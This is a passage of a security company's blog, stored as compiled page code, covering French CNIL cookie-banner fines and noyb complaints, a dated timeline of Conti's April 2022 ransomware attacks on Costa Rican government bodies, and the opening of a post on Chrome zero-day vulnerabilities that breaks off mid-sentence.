\",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/compliance/gdpr/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"GDPR\"})}),\" (General Data Protection Regulation).\"]}),/*#__PURE__*/t(\"p\",{children:[\"Something we did not mention at that time was that in January the CNIL \",/*#__PURE__*/e(o,{href:\"https://www.cnil.fr/en/cookies-cnil-fines-google-total-150-million-euros-and-facebook-60-million-euros-non-compliance\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"fined Google and Facebook\"})}),\" because they were making it way too cumbersome for users to reject cookies. (These are character strings placed in a browser's memory in response to a requested resource to be used on any subsequent visits or requests.) Google and Facebook's fines were €150 million ($170 million) and €60 million ($68 million) respectively. Last week, Google introduced a button in their cookie banner that lets users in France reject all cookies without any further screens, as easily as they can accept all cookies. Let's look at the details.\"]})]});export const richText10=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"CNIL to defend the freedom of consent\"}),/*#__PURE__*/t(\"p\",{children:[\"What \",/*#__PURE__*/e(o,{href:\"https://www.theverge.com/2022/4/21/23035289/google-reject-all-cookie-button-eu-privacy-data-laws\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"happened\"})}),\" is these companies' cookie banners were violating EU data privacy laws. The problem was simply something we users are all too familiar with. It's when there is a button that says \\\"Accept all,\\\" or any variation of that, but then there is no option that makes it equally easy to reject cookies. Instead, the user has to go through a lengthy process of configuration. And sometimes, for example in \",/*#__PURE__*/e(o,{href:\"https://www.dataprotectionreport.com/2022/02/rejecting-cookies-should-be-as-easy-as-accepting-cookies-new-sanctions-by-the-french-authority-cnil/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"the case of Facebook\"})}),', users are presented with a button ambiguously labeled \"Accept cookies\" after they went through the whole process of configuring each cookie used individually, even disabling all of them.']}),/*#__PURE__*/t(\"p\",{children:[\"In its \",/*#__PURE__*/e(o,{href:\"https://www.cnil.fr/en/cookies-cnil-fines-google-total-150-million-euros-and-facebook-60-million-euros-non-compliance\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"article\"})}),\" announcing the fines, the CNIL backed its argument by appealing to a psychological phenomenon. Namely, because users are interested in quickly consulting a website, the asymmetry of steps required for accepting and rejecting cookies influences their choice in favor of consent. This simple strategy was found to infringe Article 82 of the French Data Protection Act.\"]}),/*#__PURE__*/e(\"p\",{children:\"The companies not only had to pay the fines, but they were also ordered by the CNIL to provide Internet users located in France with an option to reject all cookies as simple as that to accept them all. Cue Google's new cookie consent option.\"}),/*#__PURE__*/e(\"h2\",{children:\"Reject all cookies upon the first click\"}),/*#__PURE__*/t(\"p\",{children:['The introduction of the \"Reject all\" button was announced last week in a ',/*#__PURE__*/e(o,{href:\"https://blog.google/around-the-globe/google-europe/new-cookie-choices-in-europe/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"blog post\"})}),' by Google\\'s product manager Sammit Adhya. This button is presented next to the \"Accept all\" option and is designed to be equally weighted visually. This design choice is not negligible, as the companies are required to eliminate any variable that could make one option more salient than the other.']}),/*#__PURE__*/t(\"p\",{children:[\"Both Google Search and YouTube now show the button to users in France while signed out or in Incognito Mode. According to Adhya, this option will be available soon to users across the rest of the European Economic Area, as well as those in the U.K. and Switzerland. Of course, users in France that are signed in can adjust their preferences from their Google account's \",/*#__PURE__*/e(o,{href:\"https://myaccount.google.com/data-and-privacy\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"data and privacy\"})}),\" options.\"]}),/*#__PURE__*/e(\"img\",{alt:\"YouTube message\",className:\"framer-image\",height:\"539\",src:\"https://framerusercontent.com/images/4QYUzXcjk4qrv0z9cC7DaBaSfs.png\",srcSet:\"https://framerusercontent.com/images/4QYUzXcjk4qrv0z9cC7DaBaSfs.png?scale-down-to=512 512w,https://framerusercontent.com/images/4QYUzXcjk4qrv0z9cC7DaBaSfs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/4QYUzXcjk4qrv0z9cC7DaBaSfs.png 1919w\",style:{aspectRatio:\"1919 / 1079\"},width:\"959\"}),/*#__PURE__*/e(\"h2\",{children:'noyb to end the \"cookie banner terror\"'}),/*#__PURE__*/t(\"p\",{children:[\"The use of unlawful cookie banners has, of course, got the attention of the European Center for Digital Rights, known shortly as noyb (the meaning of this acronym is none of your business). In a \",/*#__PURE__*/e(o,{href:\"https://noyb.eu/en/noyb-aims-end-cookie-banner-terror-and-issues-more-500-gdpr-complaints\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"news article\"})}),\" they posted almost one year ago, they explained they developed a software that detects banners that make it more difficult to reject than to accept cookies and generates GDPR complaints.\"]}),/*#__PURE__*/e(\"p\",{children:\"Back then, noyb said they had sent complaint drafts to 560 websites from 33 countries. These drafts were more of a warning, giving companies one month to change their banner and software settings. What's more, they sent violators a guide showing every step to make the changes. But if the companies failed to comply, noyb officially notified the relevant authority.\"}),/*#__PURE__*/t(\"p\",{children:[\"noyb \",/*#__PURE__*/e(o,{href:\"https://noyb.eu/en/more-cookie-banners-go-second-wave-complaints-underway\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"announced\"})}),\" this year in March that they launched a second round, filing 270 draft complaints and extending the response deadline to two months. They also informed that 42% of all violations found last year were remedied within the deadline. But 82% of all companies failed to fully comply with the demand and were reported to the data protection authorities. Although most of the latter confirmed the receipt of complaints, what is next appears to be a lengthy process. Still, after Google's case, companies may feel encouraged to follow suit.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Just promote people's informed choice\"}),/*#__PURE__*/e(\"p\",{children:\"Up until this point, we talked about cookies like they are an unwanted thing. Still, websites normally tell you that they use cookies \\\"to provide you with a better user experience.\\\" We are not about to discuss whether this is always the case. You probably know that necessary cookies include those that detect errors, store your consent state or help the website know that you are not a bot. Other kinds track your surfing behavior, some of their purposes being user profiling and selling for further advertising. What's key here is that you know what you are agreeing to and know that you can complain when that's not made clear.\"}),/*#__PURE__*/t(\"p\",{children:[\"Finally, if you are in charge of engineering how cookies work on your company's website or deciding on the content of the banner, make sure that you comply with standards such as the \",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/articles/criteria-compliance-gdpr\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"GDPR\"})}),\" and the \",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/articles/criteria-compliance-eprivacy/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ePrivacy directive\"})}),\", especially if you have users in Europe.\"]})]});export const richText11=/*#__PURE__*/e(r.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"Conti — the gang \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/timeline-new-cyberwar/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"we had said\"})}),\" is supporting Russia in cyberwar and had suffered a significant breach of its internal chats — attacked some computer systems of the government of Costa Rica last week. Being a \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/ransomware/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ransomware attack\"})}),\", Conti asked for 10M dollars. But the current president, Carlos Alvarado, said that the Costa Rican state would pay nothing! Now, from different fronts, the cyberattacks continue in a worrying expansion, even reaching private firms.\"]})});export const richText12=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Timeline of events to date\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1515792916140204041/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"On April 17\"})}),\", Conti began posting on its \",/*#__PURE__*/e(o,{href:\"https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\".onion.ly News channel\"})}),\" about the hacking of Costa Rica's Ministerio de Hacienda. Apparently, these cybercriminals downloaded 1 TB from their portal \",/*#__PURE__*/e(o,{href:\"https://www.hacienda.go.cr/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"hacienda.go.cr\"})}),\" along with internal documents to be made public on the 23rd of this month. (At the time of writing this post, that governmental website is out of service.) \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516111101703958538/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"The next day\"})}),\", they requested the aforementioned amount of money, suggesting the ministry pay it to keep their taxpayers' data. To make things worse, Conti later noted that they had additionally compromised the Ministerio de Ciencia, Innovaci\\xf3n, Tecnolog\\xeda y Telecomunicaciones (MICITT) website. (\",/*#__PURE__*/e(o,{href:\"https://www.micitt.go.cr/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"micitt.go.cr\"})}),\" is also out of service at the time of this writing. This and the previous deactivation \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/mas-instituciones-bajo-ataque-de-conti-que-aumenta/DDMQK5ZXKFHBXDGFB3MTX3GYR4/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"are said\"})}),' to have been preventive measures.) And in a section of that website, they left this message: \"We say hello from conti, look for us on your network.\"']}),/*#__PURE__*/e(\"img\",{alt:\"Attack against Costa Rica\",className:\"framer-image\",height:\"186\",src:\"https://framerusercontent.com/images/Z3aEBEaX9br133Tm1HDoTl03WLw.png\",srcSet:\"https://framerusercontent.com/images/Z3aEBEaX9br133Tm1HDoTl03WLw.png?scale-down-to=512 512w,https://framerusercontent.com/images/Z3aEBEaX9br133Tm1HDoTl03WLw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Z3aEBEaX9br133Tm1HDoTl03WLw.png 1980w\",style:{aspectRatio:\"1980 / 373\"},width:\"990\"}),/*#__PURE__*/t(\"h6\",{children:[\"Image taken from \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1515792916140204041/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"BetterCyber's Twitter account\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516344303525765124/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"On April 19\"})}),\", the gang threatened to continue attacking Costa Rican ministries until it received its money. \",/*#__PURE__*/e(o,{href:\"https://twitter.com/HaciendaCR/status/1516401226862284803/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"The same day\"})}),\", the Ministerio de Hacienda began to alert the citizens about the actions of unscrupulous people who were masquerading as ministry workers asking some of them to reset their passwords. It also provided telephone numbers that the citizens could use to inform authorities in case of receiving messages or calls of dubious origin. \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516486086444396545/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Then\"})}),\", without waiting for the earlier imposed deadline, Conti allegedly began to publish internal Costa Rican government documents, \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516568617269219339/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"offering four links\"})}),\" to .rar/.zip files. Moreover, materializing its threat, \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516569937418113025/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Conti stated\"})}),\" having stolen information from the Instituto Meteorol\\xf3gico Nacional and the Radiogr\\xe1fica Costarricense's email servers. And concluded its message with an unsettling remark:\"]}),/*#__PURE__*/e(\"blockquote\",{children:/*#__PURE__*/e(\"p\",{children:\"The costa rica scenario is a beta version of a global cyber attack on an entire country.\"})}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1516934122878517248/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"On April 20\"})}),\", Conti continued with the publication of private data. It revealed a total of 15.08 GB, reaching 39.77 GB \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1517097783446192130/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"the following day\"})}),\". \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/mas-instituciones-bajo-ataque-de-conti-que-aumenta/DDMQK5ZXKFHBXDGFB3MTX3GYR4/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"At that time\"})}),\", the Journalist Carlos Cordero for Costa Rica's El Financiero described the government's response to the situation as weak and erratic. Different sectors were already demanding clarity on the affected data and contingency plans. But the government was still hiding behind the investigation process. \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1517130809660121092/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"On April 21\"})}),\", Conti included the Fondo de Desarrollo Social y Asignaciones Familiares and the Ministerio de Trabajo y Seguridad Social to its list of victims. According to another \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/ataques-ciberneticos-aumentaron-contra-empresas-e/3UKWNFT67RABXOS6MLXBUDEGM4/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"report by Cordero\"})}),\", a year ago, Costa Rica's institutions suffered 819 attacks a week. Last week, after Conti's onslaught began, that number reached 1,468. Multiple attackers have targeted the websites of organizations in this country to exploit their vulnerabilities. In addition, as Cordero pointed out, they have taken advantage of the low IT security culture in Costa Rica.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/gobierno-emite-directriz-para-enfrentar-a-hackers/LQL2IWCVF5EMDAN7U3MO5D4TDM/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"The attacks\"})}),\", especially on the Ministerio de Hacienda, had already affected the declaration and payment of taxes, as well as Costa Rica's import and export operations. (Exporters' unions were already estimating losses of hundreds of millions \",/*#__PURE__*/e(o,{href:\"https://therecord.media/conti-ransomware-attack-was-aimed-at-destabilizing-government-transition-costa-rican-president-says/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:'\"due to the bottlenecks'})}),' caused by [...] outages related to the disruption of the tax and customs platforms.\") The government, for its part, as Cordero communicated, presented a guideline with basic actions such as modifying passwords, updating systems, deactivating unnecessary services and ports, and monitoring computer networks. However, these are recommendations to follow from the beginning, from a preventive point of view, not primarily to put out fires. By April 21, the government showed no signs of wanting to pay Conti. From there, the criminals had to move on to offer a discount:']}),/*#__PURE__*/e(\"img\",{alt:\"For Costa Rica 9%\",className:\"framer-image\",height:\"567\",src:\"https://framerusercontent.com/images/sjGCmWQhsccZrndqsvO1uIcIo.png\",srcSet:\"https://framerusercontent.com/images/sjGCmWQhsccZrndqsvO1uIcIo.png?scale-down-to=512 512w,https://framerusercontent.com/images/sjGCmWQhsccZrndqsvO1uIcIo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/sjGCmWQhsccZrndqsvO1uIcIo.png?scale-down-to=2048 2048w,https://framerusercontent.com/images/sjGCmWQhsccZrndqsvO1uIcIo.png 2394w\",style:{aspectRatio:\"2394 / 1134\"},width:\"1197\"}),/*#__PURE__*/t(\"h6\",{children:[\"Image taken from \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1517155508704010240/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"BetterCyber's Twitter account\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"Nevertheless, President Alvarado —nearing the end of his term— was emphatic in \",/*#__PURE__*/e(o,{href:\"https://twitter.com/CarlosAlvQ/status/1517212653520891905?cxt=HHwWgsC53dW3nI4qAAAA\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"his Twitter video\"})}),\", saying they would not pay anything. According to his criteria, this attack is not a money issue, but seeks to threaten the country's stability at a transitional juncture. He asserted that the government was rigorously and thoughtfully dealing with this incident. They even \",/*#__PURE__*/e(o,{href:\"https://www.presidencia.go.cr/comunicados/2022/04/gobierno-firma-directriz-que-fortalece-las-medidas-de-ciberseguridad-del-sector-publico/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"signed a directive\"})}),\" supposedly to strengthen security measures in public sector institutions. \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1517207258563813376/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Meanwhile\"})}),', the total amount of shared data reached 43.89 GB. Although Conti spoke of compressed databases that, once unpacked, would correspond to 853 GB. They offered it to other malicious hackers (curiously their \"colleagues from Costa Rica\") as an ideal material for phishing and, consequently, to make a profit. Subsequently, as Cordero stated ',/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/casi-165000-intentos-de-hackeo-y-de-software/WGOXXWPPIVFPFACDBNI7ZCZ3V4/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"on April 22\"})}),\", at least in the 100 institutions that adopted security measures since the beginning of the week, almost 165,000 hacking attempts were detected. Worryingly, more than 200 institutions had yet to take cybersecurity measures at that time.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/casi-165000-intentos-de-hackeo-y-de-software/WGOXXWPPIVFPFACDBNI7ZCZ3V4/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"That same day\"})}),\", President-elect Rodrigo Chaves expressed his concern about cyberattacks and their consequences on the functioning of the institutions and the payment of salaries. The MICITT made it clear how right and necessary it is to prioritize and invest resources in cybersecurity across the country. And they insisted that they were in control of the situation, having blocked the attacks to prevent their spread in affected and unaffected institutions. However, what happened next doesn't seem to be faithful proof of that.\"]}),/*#__PURE__*/t(\"p\",{children:[\"On April 23, when \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1517865344429441024/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:'Conti congratulated \"Chavez\"'})}),\" on his victory, flattered his country and people, and invited him for a private chat, the Junta Administrativa del Servicio El\\xe9ctrico de Cartago (JASEC) was \",/*#__PURE__*/e(o,{href:\"https://therecord.media/conti-ransomware-cripples-systems-of-electricity-manager-in-costa-rican-town/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"being a new victim\"})}),\" of \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1518155247788740608/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"theirs\"})}),\". It seems that the servers used to manage JASEC's website, email and administrative and revenue systems were encrypted. And although JASEC had to suspend the payment of bills temporarily, \",/*#__PURE__*/e(o,{href:\"https://www.facebook.com/photo/?fbid=358984659594201&set=a.256898136469521\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"it reported\"})}),\" that electricity and Internet services for its thousands of users were operating normally. \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/detectan-otros-201000-intentos-de-hackeo-en-153/VTP447KOJZEGRBGMXOHZMVEDAI/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"On April 24\"})}),\", MICITT reported the detection of 201,000 hacking attempts in the last 24 hours. Then, on April 25, as the Costa Rican government's refusal to pay was further solidified, Conti began talking about lashing out at large companies in this nation that will be forced to pay:\"]}),/*#__PURE__*/e(\"img\",{alt:\"For Costa Rica 84%\",className:\"framer-image\",height:\"419\",src:\"https://framerusercontent.com/images/cr4Gs0M4szyV6cpss9VvUOXccc.png\",srcSet:\"https://framerusercontent.com/images/cr4Gs0M4szyV6cpss9VvUOXccc.png?scale-down-to=512 512w,https://framerusercontent.com/images/cr4Gs0M4szyV6cpss9VvUOXccc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/cr4Gs0M4szyV6cpss9VvUOXccc.png 1796w\",style:{aspectRatio:\"1796 / 839\"},width:\"898\"}),/*#__PURE__*/t(\"h6\",{children:[\"Image taken from \",/*#__PURE__*/e(o,{href:\"https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Conti's site\"})}),\" on April 26.\"]}),/*#__PURE__*/t(\"p\",{children:['\"We will show you all your vulnerabilities.\" The security vulnerabilities are something that these threat actors continue to ',/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/que-hackeo-conti-en-jasec-la-nueva-entidad-en/NPT74BALHVB7TDPRUIPFRB772Q/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"take advantage of\"})}),\". One firm affected \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/carlos-herrera-ceo-de-aeropost-ataque-expuso-datos/EXXFKHDNWVGAZAATW73ZGRBVMM/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"a few days ago\"})}),\" was Aeropost. The data of approximately 5% of their clients in the region (i.e., not only in Costa Rica) were compromised. Yesterday, \",/*#__PURE__*/e(o,{href:\"https://www.elfinancierocr.com/tecnologia/conti-ataca-dos-instituciones-mas-inder-y-la-sede/FEND6DV4OVAETJ4X3RBMFO3L5Q/story/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"April 26\"})}),\", two more institutions were added to the list of Conti's victims: the \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1518998432651878400?cxt=HHwWgIC5idnByJQqAAAA\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Sede Interuniversitaria de Alajuela\"})}),\" and the Instituto de Desarrollo Rural. \",/*#__PURE__*/e(o,{href:\"https://twitter.com/_bettercyber_/status/1519303501456855040/photo/1\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Today\"})}),\", to add insult to injury, Conti seems to have extended their assaults to Peru.\"]}),/*#__PURE__*/t(\"p\",{children:[\"How many more affected organizations will emerge in the coming days? We have no idea. What is clear to us at Fluid Attacks is that prevention is key. \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/contact-us/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"Contact\"})}),\" one of our consultants, and find out how our \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/what-is-ethical-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"ethical hackers\"})}),\" can stay ahead of malicious hackers, identify your security vulnerabilities before they do, and help you protect your systems.\"]})]});export const richText13=/*#__PURE__*/e(r.Fragment,{children:/*#__PURE__*/t(\"p\",{children:[\"Are you sure you're using the latest version of Google Chrome? Make sure you are. So far this year, Chrome has received three strikes. Cybercriminals have exploited \",/*#__PURE__*/e(\"em\",{children:\"at least\"}),\" three zero-day vulnerabilities in this famed web browser.\"]})});export const richText14=/*#__PURE__*/t(r.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"First strike: CVE-2022-0609\"}),/*#__PURE__*/t(\"p\",{children:[\"Barely \",/*#__PURE__*/e(o,{href:\"https://www.zdnet.com/article/google-we-stopped-these-hackers-who-were-targeting-job-hunters-and-crypto-firms/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"beginning this year\"})}),\", a couple of North Korean hacking groups were already exploiting a Google Chrome zero-day vulnerability. A little over a month later, on \",/*#__PURE__*/e(o,{href:\"https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(a.a,{children:\"February 10\"})}),\", Google's Threat Analysis Group (TAG) discovered it and, within days, managed to patch this high-severity bug: 